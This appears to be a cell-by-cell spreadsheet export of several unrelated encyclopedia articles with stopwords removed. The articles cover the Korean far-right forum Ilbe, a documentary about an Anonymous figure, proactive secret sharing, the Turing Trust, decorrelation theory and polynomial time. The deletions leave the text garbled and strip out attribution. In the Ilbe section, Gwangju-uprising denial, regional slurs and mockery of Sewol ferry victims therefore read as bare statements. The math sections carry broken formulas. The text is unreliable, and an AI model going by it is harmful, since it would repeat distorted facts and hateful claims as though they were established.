    <t>daily-best archive (korean: 일간베스트 저장소; hanja: 日刊베스트 貯蔵所; ilganbeseuteu jeojangso) ilbe storage (korean: 일베저장소; hanja: 日베貯蔵所; ilbe jeojangso; lit. "daily best archive"), also known ilbe garage, south korean internet forum predominantly far-right userbase. site created april 2010 started archive "daily best" posts inside. ilbe's userbase often described alt-right, anti-feminist, anti-immigrant, anti-lgbt stance. vocal users strong political cultural influence, ilbe gained widespread attention social critics, labeling website social phenomenon. some critics consider ilbe korean analogue 4chan 2channel. history ilbe, short ilgan best (korean: 베스트; hanja: 베스트; lit. daily best), term sections inside showing popular threads day. ilbe among several archive websites aggregated deleted threads. november 2016, sections removed inside media started claiming ilbe archive original website inside branched ilbe launched moe-myeongsu (korean: 모에명수; hanja: 모에名手) july 2009 archive inside comedies gallery. 2016, attempted ilbe owners, claiming mimicked website offline maintenance.in april 2010, another website name created twins gallery. november, retired running site left users active time: bucheo (부처) sae-bu (새부, 새침부끄 saechim-bukkeu). bucheo would later also leave ilbe military conscription, sae-bu would hire janitors, programmers, staff site. year later, ilbe reorganized independent forum.in december 2012, ilbe million registered users million accounts april 2015. september 2016, 20,000 viewers peak hours. even mornings, number viewers minimal, exceeded 10,000 people. according website administration, data include mobile users, made total traffic.in 2016, park geun-hye scandal happened, ilbe audience reduced quite lot, 700,000 daily viewers september 520,000 december. concurrent views peak hours also decreased 10,000 views.in august 2018, person nicknamed "lazy dawn" (나른한새벽 nareun-han saebyeok) became administrator site. structure website rules, prohibit users mentioning username getting close order prevent users dissenters down-voted indiscriminately existing users. this policy promotes anonymity thus equality. contrast, popular korean forums, older users respected hold greater authority discussions. these forums largely unmoderated, exception cases result litigation cases response complaints.an account created e-mail; ilbe require documents number registration, unlike korean websites. users begin reputation descend zero result downvoting users. registration required post view boards (except nsfw boards). exception random chat (잡담) board, absolutely anonymous require account—users named "anonym" random number. created users tired jjalbang's obsession politics, nearly popular. jjalbang (짤방-유머 "memes humor") active board ilbe. popular posts featured "daily best" (일간베스트) boards return "memes" receive many dislikes. "like" "dislike" buttons ilbe named daily best!" (일베로 ilbe-ro) "democratization" (民主化 minjuhwa). only registered users vote. users high reputation vote twice.the politics board created "quarantine" serious political posts general forums, later became distinct community, often antagonizing jjalbang board, often features political memes. politics favors park geun-hye, jjalbang, myung-bak preferred. 2020, core "oldfag" users migrated inside, initially "wuhan minor" gallery politics minor" gallery. animation board often described center ilbe. main topic japanese anime, topics discussed, board often compared random board. thought populated attention whores. users anime board tend socialize ilgays; gather kakaotalk chats talk play games, even though moderators prevent board antagonizes girl groups artists (걸그룹/연예인) board, known reservation" also japanese korean culture. subculture large part ilbe's subculture comes users' collective identity "losers" sort: founding ilbe, large korean forums left-leaning extent anyone even moderate right-wing opinion endure ridicule name-calling majority, including moderators. thus, ilbe's userbase embraced many derogatory terms used leftists, "ilgay" (일게이), show pride dissent. forking inside, ilbe inherited large part subculture. many controversial memes originate inside, including moo-hyun memes inside happhil gallery, well hong'eo (korean: hanja: lit. skates, slur targeting jeolla people) eomuk (어묵, mocking name sewol ferry disaster victims) basketball gallery. ilbe users known redacting well-known logos organisations like universities, government structures, large private companies, well movie posters. they tiny hints consisting ilbe initials, mu-hyeon face, memes. occasionally media pick images reports. evidence uses recorded ilbe distinct genre posts called "broadcast proofs" 인증). another type popular post dongmuljup (동물줍). features ilbe users picking street animals, usually birds cats, sometimes strange exotic animals. ironic term saramjup (사람줍) describes reporting drunk people fainted streets police. users termed haeng-gays (행게이, short 행동하는 active member"). "sniper posts" (저격글) also common site. they discuss posts ilbe websites analyze expose flaws. they often feature investigations posted photos find clues determine taken. political stance background ilbe's users' political stance generally right, ilbe raised controversy strong opinions, mainly left. users site often express racism towards chinese east asians, europeans, americans, even japanese viewed positively. prior 2008 beef protest south korea, opinions right-wing supporters mostly disregarded criticized, south korean websites dominated left-wing websites internet users. major community websites south korea, ilbe inside possess "right-wing" political disposition. after 2008 beef protest south korea, many right-wing internet users started express opinions internet. especially, inside ilbe grew quickly myriads right-wing users registered. since advent ilbe storage inside, korean internet society become politically diverse. ilbe first major online community south korea distinctively right-wing tone, noted right-wing internet. ilbe's ideology sometimes described factism proponents, treated countermeasure alleged left-wing propaganda, specifically false information right. criticizing korean leaders ilbe community mainly known koreans allegedly making former president moo-hyun. political parties criticized mu-hyeon political leaders many forms media, comedy, parody music, spreading rumors social media. users make ilbe "theme song" every year, regularly parody popular songs lyrics criticize leaders. ilbe users compose parody songs propaganda attracts people, coincidentally listen songs, join community. users sense humor songs, exaggerating expressions political leaders colloquially referring muhyeon" (roh moo-hyun), daejung" (kim dae-jung), jong-un" (kim jong-un), geunhye" (park geun-hye). this makes songs sound legitimate ways. ilbe users also call 'the gravity', making moo-hyun's death (suicide jumping) saying gravity killed him. notable memes "noala", image mu-hyeon photoshopped koala face. ilbe also came label unji composed hanja characters meaning fall" "ground", also referencing unjicheon beverage promotion clips). distinct part ilbe slang verb ending, referencing moo-hyun's surname.on january 2018, poster showing mu-hyeon making ilbe hand sign appeared times square, york. ilbe users celebrated birthday current president moon jae-in. billboard also featured noala unji memes.on november 2013, former first lady hee-ho, whose husband former president dae-jung, accused ilbe users degrading deceased president spreading false information.presidents approved ilbe called gakha (가카, corrupted "their excellency", obsolete title associated dictatorship). initially used regards myung-bak, purportedly planned restore title, used park chung-hee (元祖閣下 원조가카 weonjo gakha "original gakha") daughter park geun-hye rekha, short reidi gakha "lady gakha"). term (with korean transliteration english word god) also used, implies omnipotent power president. denial gwangju uprising despite south korean government officially treating gwangju uprising justified civil movement passing special law, ilbe extremely critical memorial foundation, gwangju uprising memorial organizations, announced ilbe spreading conspiracy theories north korean special forces involved gwangju uprising. gwangju uprising heavily armed riot. military suppression citizens justifiable. 5.18 special (5.18특별법), pays respect gwangju uprising, unconstitutional.ilbe also labels journalists, like former chief editor monthly chosun gap-je, jwappal "far-left communist") support gwangju uprising. hatred towards honam region almost ilbe users intense dislike honam region, historically known jeolla, southwestern portion south korea. this several factors, including fact honam vote regional left-wing party candidate dae-jung, belief gwangju uprising placed pedestal locals, extent moments history korean democratisation overlooked, democratization uprising movement, simply riot. intense disliking manifests verbal attacks jeolla related political figures. misogyny accusations ilbe takes extremely hostile attitude toward types south korean women deems undesirable, expresses hatred towards them. ilbe members think superior women deferential them. ilbe labels women conform gender norms "kimchi nyun", reference national food, kimchi. through label, ilbe community implies characteristics displayed korean women. ilbe's community seen anti-feminist community, composed mostly males. female users ilbe called "am-be-choong" (암베충) (am: expression females (mostly used animals)/be: (ilbe)/choong: insect) users. female users openly "come out" female banned website, mainly presences likely cause disputes, contributing decline website. criticism shin hye-sik, representative right-wing dokrip newspaper said "(ilbe users) apologize problematic claims". young-hwan, former pro-north activist, said "right-wing attitude inherit conservative awareness, criteria ilbe right-wing. ilbe's radical argument escalate social chaos". yoon pyong-joong, professor hanshin university defined ilbe's far-right extremism "not worth discussing all". they shared understanding ilbe criticized public argument, legal action. conservative magazine shindonga released special section criticize ilbe, describing "close fascism rather normal right-wing" "antisocial". japanese journalist yasuda goichi, author internet patriotism (netto aikoku), viewed ilbe similar uyoku dantai, japanese anti-zainichi far-right online community.one sexual assault counsellor said combination [the] commodification women peer culture lies beneath korean society", women organization women link activist yoon-so said, "ilbe seems express misogyny behind anonymity, enjoying propagation". misogyny expressed ilbe's language subculture. misogynistic ilbe users simultaneously bemoan fact serve military breadwinners south korean families men, opposing women workplace. hence, women attacked housewives working. lack moderation sometimes results criticized behavior, including defamation harassment. actions website users routinely disapproved korean officials. notable case korea communications standards commission (kcsc) requested ilbe regulate problematic content "harmful teenagers". hand, website praised anonymity free spirit: hyung-hwan, spokesman right-wing saenuri party mentioned ilbe "free space innocent people speak minds freely". parliamentary inspection held october 2013, member democratic party, seung-hui, described ilbe "antisocial". released information kcsc, including hundreds submitted complaints harmful content ilbe promoting suicide, crime, drug usage, sexism, violence, well defamation discrimination left-wing politics jeolla region.as users engage questionable behavior online offline, website acquired generally negative image, especially among political left. thus, users tend reveal identity ilbe user real world prevent ostracized. people avoid "ilming-out" (일밍아웃), disclosure ilbe user general public. having resort discreet measures display identity, ilbe users devised hand sign represents korean initials website's name.at times, korean celebrities accidentally used ilbe terminology social media, leading people think ilbe members. avoid misunderstood ilbe member, artists companies cautions products publicly deny affiliation. example, agency k-pop dance group crayon mentioned ilbe "antisocial" denying alleged involvement ilbe. despite that, crayon artists became icons ilbe, users started massively purchasing albums. korean professional gamer hong jin-ho denied alleged involvement ilbe, writing never visited ilbe. heard ilbe disagreeable. such allegations disgusting." twitter account. conservative saenuri party member jin-tae raised controversy accessed ilbe laptop parliamentary inspection national assembly.as ilbe started influence social media internet society, much korean media started observe analyze behavior users. controversies ilbe users protest different issues country ended mass protests singing ilbe songs city squares. many ilbe users tried degrading public order. november 2013, first trial defamation committed ilbe user injured honor gwangju uprising victims disparaging corpse photo 'skate parcel'. offender claimed felt sorry actions, sending apology victims phone call, organizations related gwangju uprising victims said apology. requested jurisdictional transfer case gwangju district court daegu district court accepted.the website also raised controversy mocking death boy-band singer yoon-taek stomach cancer.in april 2013, anonymous korea released membership list uriminzokkiri, ilbe users witchhunted many identities list 'communist' 'north korean spies'. after seoul national university student council's declaration protest 2013 south korea election meddling scandal, ilbe user released photos members opposition mentioned care whether guys lynch not'. seoul national university student council stated considering lawsuit ilbe. september 2013, 32-year-old male ilbe user protested front ewha women's university. hung cardboard neck messages written opposition ewha university students, comfort women, korean women. some comments related women's genitalia others stated women "communist" "pro-north korea". fined ₩1,500,000 seoul west prosecutor's office, blamed "wrong democracy".on november 2013, former first lady hee-ho, whose husband former president dae-jung, accused ilbe users degrading deceased president spreading false information.on december 2013, ilbe user claiming employee comotomo feeding bottle company alleged interrupted manufacturing process 'sucking feeding bottles. confirmed employment company uploading photo ilbe title 'titty party' commented "sometimes suck feeding bottle miss female breasts much". post raised outrage childcare community, vulgarism also hygiene concerns. comotomo korea released official apology controversy mentioned employment ilbe user mistake. employee's accident report revealed, confessed: submitted vulgar contents ilbe. caused economic mental damage company consumers entertainment. feeding bottle controversy created totally false take legal responsibility."seoul central district court accepted provisional injunction ilbe. petitioned ilbe critic degraded threatened ilbe users. result, ilbe forced delete antisocial contents. some police officers soldiers publicly described former presidents chun doo-hwan park chung-hee 'patriotic' ilbe, caused controversy violated political neutrality required public officers. another instance, police officer described left-wing protesters 'rioters' ilbe. sent yongsan police office disciplinary committee.some ilbe members alleged registered shinee world (fan club) post defamatory comments jonghyun voiced support student cause support rights, aforementioned hand-written posters around korean universities. moreover, posted obscene photos offensive captions related women's bodies site.in august 2017, maeng-gi, author naver webtoon gangnam beauty, filed complaint misdemeanor ilbe member making malicious posts feminist views site. said member later posted copy complaint ilbe title sued webtoon writer", accused prosecutor "being biased". posters vandalism december 2013, self-claimed ilbe users vandalized hand-written posters universities colleges around south korea. publicizing hand-written posters criticized political indifference, social disharmony, inequality, south korea allegations, ongoing rail strike, political social issues started korea university spread among korean universities. however, culture generally seen far-left, communistic pro-north korea ilbe users.hand-written posters korea university campus vandalized self-claimed ilbe users. user confirmed vandalism uploading photo online sexually degrading comments original writer poster. after became controversial, revealed identity uploaded apology actions also announced accuse people degraded action.similar vandalism ongoing nationwide busan university, hannam university daejeon, sogang university.ha tae-keung, member conservative saenuri party (now people power party) described ilbe users committed vandalism "losers". hacking cases 2012, anonymous ilbe users attempted attack todayhumor, website left-wing stance. administrator todayhumor announced would consider legal action ilbe.an unknown hacker group made distributed denial-of-service attack ilbe april 2013. attack reported possible revenge anonymous ilbe's vandalism #opisrael irc. anonymous korea claimed twitter account involved denial service ilbe also mentioned ilbe members entered chatroom used anonymous hackers stirred using insulting language spamming chatroom. relationship anonymous korea anonymous remains ambiguous. sewol ferry victims defamation september 2014, parents victims sewol ferry disaster protested public hunger strikes, ilbe users went "binge eating" events front them. first offline event ilbe users took part in.in january 2015, ilbe user posted photo danwon high school uniform eating eomuk fish cakes. demonstrated ilbe hand sign title post eaten friend!" (implying fish corpses sewol victims eomuk). post disseminated social media, victims sewol labelled eomuks odengthang (eomuk soup). police arrested person named kim, mother publicly apologized. words eomuk odengthang banned ilbe. harassment cases ilbe users often accused harassment towards women.an pre-service elementary teacher depicted female elementary school students lolini (로린이, "lolita girl") wrote associated sexual content ilbe. this caused controversy ended resigning.on november 2013, student kangwon provincial college, self-claimed ilbe user, made comments twitter containing sexual harassment female buddhist monk's virginity. three days later, monk hyo-jeon asked follow-up action president college ilbe user apologize continued insult her. following controversy, deleted twitter account president college gave official apology.in october 2018, ilbe user uploaded photo naked woman post titled "32-years ilgay saved pocket money 74-years bacchus grandma"(32살 왓다). this post contained story visit prostitute. revealed story fictitious. first person post picture online 46-year-old seocho district office's employee.in november 2018, ilbe user uploaded erotic photos girl post titled "girlfriend proof" (女親認證 여친인증 yeochin injeung). series similar posts followed police investigated identified posters, arrested. confessed posting real girlfriends, rest posted images found internet. also conservatism south korea minjuhwa angry young (south korea) references</t>
  </si>
  <si>
    <t>The Face of Anonymous</t>
  </si>
  <si>
    <t>face anonymous canadian documentary television film, directed gary lang released 2021. film portrait christopher "commander doyon, senior figure computer hacktivist collective anonymous spent several years living streets toronto homeless person fleeing united states criminal prosecution.the film premiered docs canadian international documentary festival april 2021, advance television broadcast tvontario. weeks film's broadcast, doyon extradited mexico, residing time, back united states face prosecution.the film canadian screen award nominee best documentary program 10th canadian screen awards 2022. references external links face anonymous imdb</t>
  </si>
  <si>
    <t>Proactive secret sharing</t>
  </si>
  <si>
    <t>proactive secret sharing underlying technique proactive security protocols. method update distributed keys (shares) secret sharing scheme periodically attacker less time compromise shares long attacker visits less threshold quorum group, system remains secure. this contrasts non-proactive scheme threshold number shares compromised lifetime secret, secret compromised. model takes time constraints account originally suggested extension notion byzantine fault tolerance redundancy sharing allows robustness time domain (periods) proposed rafail ostrovsky moti yung 1991. method used areas cryptographic protocols secure multi-party computation threshold cryptosystems. motivation players (holders shared secret) store shares insecure computer servers, attacker could crack steal/learn shares. since often practical change secret, un-compromised (honest) (shamir-style) shares updated generate secret, shares invalidated. there also need recover shares previously corrupted servers, community honest server needed perform recovery. this assures longevity secure recoverable sharing, secure correct secure computation protocols. needs maintain sharing changing number servers threshold, proactive method share recovery enables this, originally shown frankel others. ability distributing secret (codeword) recovering distributed shares proactive secret sharing method does, recognized much needed storage systems around 2010, reaction, coding theorists renamed method, refined formalized `regenerating codes' `locally recoverable codes.' mathematics this follows somewhat work order update shares, dealers (i.e., persons gives shares; distributed system participants time) generates random polynomial constant term zero calculates remaining player ordered pair, x-coordinates pairs same. each player adds y-coordinates keeps result y-coordinate secret. dealer constructs random polynomial field degree {\displaystyle k-1} {\displaystyle threshold each player gets share {\displaystyle x_{i}^{0}=f^{0}(i)} {\displaystyle i\in \{1,...,n\}} {\displaystyle number players, {\displaystyle x_{i}^{0}} share player {\displaystyle time interval {\displaystyle secret reconstructed interpolation {\displaystyle shares update shares, parties need construct random polynomial form {\displaystyle \delta _{i}(z)=\delta _{i,1}z^{1}+\delta _{i,2}z^{2}+...+\delta _{i,k}z^{k-1}} each player {\displaystyle sends players {\displaystyle u_{i,j}=\delta _{i}(j)} each player updates share {\displaystyle x_{i}^{t+1}=x_{i}^{t}+u_{1,i}^{t}+...+u_{n,i}^{t}} {\displaystyle time interval shares validall non-updated shares attacker accumulated become useless. attacker recover secret find enough non-updated shares reach threshold. this situation happen players deleted shares. additionally, attacker cannot recover information original secret update process contains random information. dealer change threshold number distributing updates, must always remain vigilant players keeping expired shares however somewhat limited view since original methods gives community server ability re-sharing dealer regenerator lost shares. example following example shares threshold players dealer. since shares polynomials valid certain time period, time period valid denoted superscript. parties agree finite field: {\displaystyle z_{11}} dealer establishes secret: {\displaystyle s=6\in z_{11}} dealer constructs random polynomial {\displaystyle z_{11}} degree (threshold {\displaystyle f^{0}(x)=6+2\times note {\displaystyle f^{0}(0)=s=6} player gets share {\displaystyle x_{1}^{0}=f^{0}(1)=6+2\times 1=8} player gets share {\displaystyle x_{2}^{0}=f^{0}(2)=6+2\times 2=10} reconstruct secret, {\displaystyle x_{1}^{0}} {\displaystyle x_{2}^{0}} since {\displaystyle f^{0}(x)} line, point slope form interpolate {\displaystyle m=(f^{0}(2)-f^{0}(1))/(2-1)=(x_{2}^{0}-x_{1}^{0})/(2-1)=(10-8)/(2-1)=2/1=2} {\displaystyle b=f^{0}(1)-m=x_{1}^{0}-2=8-2=6} {\displaystyle f^{0}(x)=b+m\times x=6+2\times {\displaystyle f^{0}(0)=6+2\times 0=6=s} update shares, parties need construct random polynomials degree free coefficient zero player constructs {\displaystyle \delta _{1}^{0}(z)=\delta _{1,1}^{0}\times z^{1}=2\times z^{1}} player constructs {\displaystyle \delta _{2}^{0}(z)=\delta _{2,1}^{0}\times z^{1}=3\times z^{1}} each player evaluates polynomial shares information players player computes {\displaystyle u_{1,1}^{0}=\delta _{1}^{0}(1)=2} {\displaystyle u_{1,2}^{0}=\delta _{1}^{0}(2)=4} {\displaystyle z_{11}} player sends player {\displaystyle u_{1,2}^{0}} player computes {\displaystyle u_{2,1}^{0}=\delta _{2}^{0}(1)=3} {\displaystyle u_{2,2}^{0}=\delta _{2}^{0}(2)=6} {\displaystyle z_{11}} player sends player {\displaystyle u_{2,1}^{0}} each player updates share {\displaystyle x_{i}^{1}=x_{i}^{0}+u_{1,i}^{0}+u_{2,i}^{0}} player computes {\displaystyle x_{1}^{1}=x_{1}^{0}+u_{1,1}^{0}+u_{2,1}^{0}=8+2+3=2\in z_{11}} player computes {\displaystyle x_{2}^{1}=x_{2}^{0}+u_{1,2}^{0}+u_{2,2}^{0}=10+4+6=9\in z_{11}} confirm updated shares generate original secret {\displaystyle x_{1}^{1}} {\displaystyle x_{2}^{1}} reconstruct polynomial {\displaystyle f^{1}(x)} since {\displaystyle f^{1}(x)} line, point slope {\displaystyle m=(f^{1}(2)-f^{1}(1))/(2-1)=(x_{2}^{1}-x_{1}{1})/(2-1)=(9-2)/(2-1)=7/1=7} {\displaystyle b=f^{1}(1)-m=x_{1}^{1}-7=2-7=-5=6} {\displaystyle f^{1}(x)=b+m\times x=6+7\times {\displaystyle f^{1}(0)=6+7\times 0=6=s} also (cryptography) generation distribution management shamir's secret sharing references</t>
  </si>
  <si>
    <t>The Turing Trust</t>
  </si>
  <si>
    <t>turing trust british charitable organisation supports education sub-saharan africa reuse computers improvement associated teacher training.the trust family computing pioneer alan turing. founded alan turing's great-nephew, james turing, 2009. dermot turing trustee since inception. countries trust active include ghana, kenya, malawi. main focus present malawi working centre youth development, based mzuzu, computer labs schools across northern central regions. turing trust registered charity england wales #1156687 scotland sc046150. partnered arcturus publishing production number turing-related puzzle books. trust based edinburgh, scotland, 2020 moved loanhead, midlothian, south edinburgh. references external links official website turing trust twitter turing trust facebook turing trust linkedin</t>
  </si>
  <si>
    <t>Decorrelation theory</t>
  </si>
  <si>
    <t>cryptography, decorrelation theory system developed serge vaudenay 1998 designing block ciphers provably secure differential cryptanalysis, linear cryptanalysis, even undiscovered cryptanalytic attacks meeting certain broad criteria. ciphers designed using principles include coconut98 candidate dfc, shown vulnerable forms cryptanalysis covered theory. according vaudenay, decorrelation theory four tasks: definition measurement decorrelation, usually relies matrix norm; construction simple primitive "decorrelation module" quite good decorrelation; construction cryptographic algorithms decorrelation modules primitive inherited algorithm; and, proving decorrelation provides security attacks. references serge vaudenay (february 1998). provable security block ciphers decorrelation (postscript). 15th annual symposium theoretical aspects computer science (stacs '98). paris: springer-verlag. 249–275. retrieved february 2007. lars knudsen vincent rijmen (march 1999). decorrelated fast cipher (dfc) theory (postscript). international workshop fast software encryption (fse '99). rome: springer-verlag. 81–94. retrieved february 2007. serge vaudenay (may 1999). resistance against general iterated attacks (pdf/postscript). advances cryptology eurocrypt '99. prague: springer-verlag. 255–271. retrieved august 2007. serge vaudenay (september 2003). "decorrelation: theory block cipher security" (pdf). journal cryptology. (4): 249–286. doi:10.1007/s00145-003-0220-6. issn 0933-2790. retrieved february 2007. external links introduction decorrelation theory online manual serge vaudenay</t>
  </si>
  <si>
    <t>Polynomial time</t>
  </si>
  <si>
    <t>computer science, time complexity computational complexity describes amount computer time takes algorithm. time complexity commonly estimated counting number elementary operations performed algorithm, supposing elementary operation takes fixed amount time perform. thus, amount time taken number elementary operations performed algorithm taken related constant factor. since algorithm's running time vary among different inputs size, commonly considers worst-case time complexity, maximum amount time required inputs given size. less common, usually specified explicitly, average-case complexity, average time taken inputs given size (this makes sense finite number possible inputs given size). cases, time complexity generally expressed function size input.: since function generally difficult compute exactly, running time small inputs usually consequential, commonly focuses behavior complexity input size increases—that asymptotic behavior complexity. therefore, time complexity commonly expressed using notation, typically {\displaystyle o(n)} {\displaystyle o(n\log {\displaystyle o(n^{\alpha {\displaystyle o(2^{n})} etc., size units bits needed represent input. algorithmic complexities classified according type function appearing notation. example, algorithm time complexity {\displaystyle o(n)} linear time algorithm algorithm time complexity {\displaystyle o(n^{\alpha constant {\displaystyle \alpha polynomial time algorithm. table common time complexities following table summarizes classes commonly encountered time complexities. table, poly(x) xo(1), i.e., polynomial constant time algorithm said constant time (also written {\textstyle o(1)} time) value {\textstyle t(n)} bounded value depend size input. example, accessing single element array takes constant time operation performed locate similar manner, finding minimal value array sorted ascending order; first element. however, finding minimal value unordered array constant time operation scanning element array needed order determine minimal value. hence linear time operation, taking {\textstyle o(n)} time. number elements known advance change, however, algorithm still said constant time. despite name "constant time", running time independent problem size, upper bound running time independent problem size. example, task "exchange values necessary {\textstyle a\leq called constant time even though time depend whether already true {\textstyle a\leq however, constant time required always here examples code fragments constant time: index item list[index]; (condition true) perform operation runs constant time else perform operation runs constant time perform operation runs constant time {\displaystyle t(n)} {\displaystyle o(a)} constant value, equivalent stated standard notation {\displaystyle t(n)} {\displaystyle o(1)} logarithmic time algorithm said take logarithmic time {\displaystyle t(n)=o(\log since {\displaystyle \log _{a}n} {\displaystyle log_{b}n} related constant multiplier, multiplier irrelevant classification, standard usage logarithmic-time algorithms {\displaystyle o(\log regardless base logarithm appearing expression algorithms taking logarithmic time commonly found operations binary trees using binary search. {\displaystyle o(\log algorithm considered highly efficient, ratio number operations size input decreases tends zero increases. algorithm must access elements input cannot take logarithmic time, time taken reading input size order example logarithmic time given dictionary search. consider dictionary contains entries, sorted alphabetical order. suppose that, {\displaystyle 1\leq k\leq access entry dictionary constant time. {\displaystyle d(k)} denote entry. under hypotheses, test word dictionary done logarithmic time: consider {\displaystyle d\left(\left\lfloor {\frac {n}{2}}\right\rfloor \right)} {\displaystyle \lfloor \;\rfloor denotes floor function. {\displaystyle w=d\left(\left\lfloor {\frac {n}{2}}\right\rfloor \right)} done. else, {\displaystyle w&lt;d\left(\left\lfloor {\frac {n}{2}}\right\rfloor \right)} continue search left half dictionary, otherwise continue similarly right half dictionary. this algorithm similar method often used find entry paper dictionary. polylogarithmic time algorithm said polylogarithmic time time {\displaystyle t(n)} {\displaystyle o{\bigl (}(\log n)^{k}{\bigr constant another write {\displaystyle o(\log ^{k}n)} example, matrix chain ordering solved polylogarithmic time parallel random-access machine, graph determined planar fully dynamic {\displaystyle o(\log ^{3}n)} time insert/delete operation. sub-linear time algorithm said sub-linear time (often spelled sublinear time) {\displaystyle t(n)=o(n)} particular includes algorithms time complexities defined above. typical algorithms exact sub-linear time parallel processing matrix determinant calculation does), alternatively guaranteed assumptions input structure logarithmic time binary search many tree maintenance algorithms do). however, formal languages strings 1-bit position indicated first {\displaystyle \log bits string depend every input computable sub-linear time. specific term sublinear time algorithm usually reserved algorithms unlike classical serial machine models allowed prior assumptions input. they however allowed randomized, indeed must randomized trivial tasks. algorithm must provide answer without reading entire input, particulars heavily depend access allowed input. usually input represented binary string {\displaystyle b_{1},...,b_{k}} assumed algorithm time {\displaystyle o(1)} request obtain value {\displaystyle b_{i}} sub-linear time algorithms typically randomized, provide approximate solutions. fact, property binary string zeros (and ones) easily proved decidable (non-approximate) sub-linear time algorithm. sub-linear time algorithms arise naturally investigation property testing. linear time algorithm said take linear time, {\displaystyle o(n)} time, time complexity {\displaystyle o(n)} informally, means running time increases linearly size input. more precisely, means constant running time {\displaystyle every input size example, procedure adds elements list requires time proportional length list, adding time constant, least, bounded constant. linear time best possible time complexity situations algorithm sequentially read entire input. therefore, much research invested discovering algorithms exhibiting linear time least, nearly linear time. this research includes software hardware methods. there several hardware technologies exploit parallelism provide this. example content-addressable memory. this concept linear time used string matching algorithms boyer–moore algorithm ukkonen's algorithm. quasilinear time algorithm said quasilinear time (also referred log-linear time) {\displaystyle t(n)=o(n\log ^{k}n)} positive constant linearithmic time case {\displaystyle k=1} using soft notation algorithms {\displaystyle {\tilde {o}}(n)} quasilinear time algorithms also {\displaystyle o(n^{1+\epsilon every constant {\displaystyle \epsilon thus faster polynomial time algorithm whose time bound includes term {\displaystyle n^{c}} {\displaystyle c&gt;1} algorithms quasilinear time include: in-place merge sort, {\displaystyle o(n\log ^{2}n)} quicksort, {\displaystyle o(n\log randomized version, running time {\displaystyle o(n\log expectation worst-case input. non-randomized version {\displaystyle o(n\log running time considering average case complexity. heapsort, {\displaystyle o(n\log merge sort, introsort, binary tree sort, smoothsort, patience sorting, etc. worst case fast fourier transforms, {\displaystyle o(n\log monge array calculation, {\displaystyle o(n\log many cases, {\displaystyle o(n\log running time simply result performing {\displaystyle \theta (\log operation times (for notation, notation family bachmann–landau notations). example, binary tree sort creates binary tree inserting element n-sized array one. since insert operation self-balancing binary search tree takes {\displaystyle o(\log time, entire algorithm takes {\displaystyle o(n\log time. comparison sorts require least {\displaystyle \omega (n\log comparisons worst case {\displaystyle \log(n!)=\theta (n\log stirling's approximation. they also frequently arise recurrence relation {\textstyle t(n)=2t\left({\frac {n}{2}}\right)+o(n)} sub-quadratic time algorithm said subquadratic time {\displaystyle t(n)=o(n^{2})} example, simple, comparison-based sorting algorithms quadratic (e.g. insertion sort), advanced algorithms found subquadratic (e.g. shell sort). general-purpose sorts linear time, change quadratic sub-quadratic great practical importance. polynomial time algorithm said polynomial time running time upper bounded polynomial expression size input algorithm, t(n) o(nk) positive constant problems deterministic polynomial time algorithm exists belong complexity class central field computational complexity theory. cobham's thesis states polynomial time synonym "tractable", "feasible", "efficient", "fast".some examples polynomial time algorithms: selection sort sorting algorithm integers performs {\displaystyle an^{2}} operations constant thus runs time {\displaystyle o(n^{2})} polynomial time algorithm. basic arithmetic operations (addition, subtraction, multiplication, division, comparison) done polynomial time. maximum matchings graphs found polynomial time. strongly weakly polynomial time contexts, especially optimization, differentiates strongly polynomial time weakly polynomial time algorithms. these concepts relevant inputs algorithms consist integers. strongly polynomial time defined arithmetic model computation. model computation basic arithmetic operations (addition, subtraction, multiplication, division, comparison) take unit time step perform, regardless sizes operands. algorithm runs strongly polynomial time number operations arithmetic model computation bounded polynomial number integers input instance; space used algorithm bounded polynomial size input.any algorithm properties converted polynomial time algorithm replacing arithmetic operations suitable algorithms performing arithmetic operations turing machine. second condition strictly necessary: given integer {\displaystyle 2^{n}} (which takes space proportional turing machine model), possible compute {\displaystyle 2^{2^{n}}} multiplications using repeated squaring. however, space used represent {\displaystyle 2^{2^{n}}} proportional {\displaystyle 2^{n}} thus exponential rather polynomial space used represent input. hence, possible carry computation polynomial time turing machine, possible compute polynomially many arithmetic operations. however, first condition, algorithms number turing machine steps bounded polynomial length binary-encoded input, take number arithmetic operations bounded polynomial number input numbers. euclidean algorithm computing greatest common divisor integers example. given integers {\displaystyle {\displaystyle algorithm performs {\displaystyle o(\log a+\log arithmetic operations numbers {\displaystyle o(\log a+\log bits. time, number arithmetic operations cannot bounded number integers input (which constant case, always integers input). latter observation, algorithm strongly polynomial time. real running time depends logarithmically magnitudes {\displaystyle {\displaystyle (that length bits) number integers input. algorithm runs polynomial time strongly polynomial said weakly polynomial time. well-known example problem weakly polynomial-time algorithm known, known admit strongly polynomial-time algorithm, linear programming. weakly polynomial time confused pseudo-polynomial time, depends linearly magnitude values problem truly polynomial time. complexity classes concept polynomial time leads several complexity classes computational complexity theory. some important classes defined using polynomial time following. complexity class decision problems solved deterministic turing machine polynomial time complexity class decision problems solved non-deterministic turing machine polynomial time zpp: complexity class decision problems solved zero error probabilistic turing machine polynomial time complexity class decision problems solved 1-sided error probabilistic turing machine polynomial time. bpp: complexity class decision problems solved 2-sided error probabilistic turing machine polynomial time bqp: complexity class decision problems solved 2-sided error quantum turing machine polynomial timep smallest time-complexity class deterministic machine robust terms machine model changes. (for example, change single-tape turing machine multi-tape machine lead quadratic speedup, algorithm runs polynomial time model also other.) given abstract machine complexity class corresponding problems solved polynomial time machine. superpolynomial time algorithm defined take superpolynomial time t(n) bounded polynomial. using little omega notation, ω(nc) time constants input parameter, typically number bits input. example, algorithm runs steps input size requires superpolynomial time (more specifically, exponential time). algorithm uses exponential resources clearly superpolynomial, algorithms weakly superpolynomial. example, adleman–pomerance–rumely primality test runs no(log time n-bit inputs; grows faster polynomial large enough input size must become impractically large cannot dominated polynomial small degree. algorithm requires superpolynomial time lies outside complexity class cobham's thesis posits algorithms impractical, many cases are. since versus problem unresolved, unknown whether np-complete problems require superpolynomial time. quasi-polynomial time quasi-polynomial time algorithms algorithms longer polynomial time, long exponential time. worst case running time quasi-polynomial time algorithm {\displaystyle 2^{o(\log ^{c}n)}} fixed {\displaystyle c&gt;0} {\displaystyle c=1} polynomial time algorithm, {\displaystyle c&lt;1} sub-linear time algorithm. quasi-polynomial time algorithms typically arise reductions np-hard problem another problem. example, take instance hard problem, 3sat, convert instance another problem size instance becomes {\displaystyle 2^{o(\log ^{c}n)}} case, reduction prove problem np-hard; reduction shows polynomial time algorithm unless quasi-polynomial time algorithm 3sat (and thus np). similarly, problems know quasi-polynomial time algorithms, polynomial time algorithm known. such problems arise approximation algorithms; famous example directed 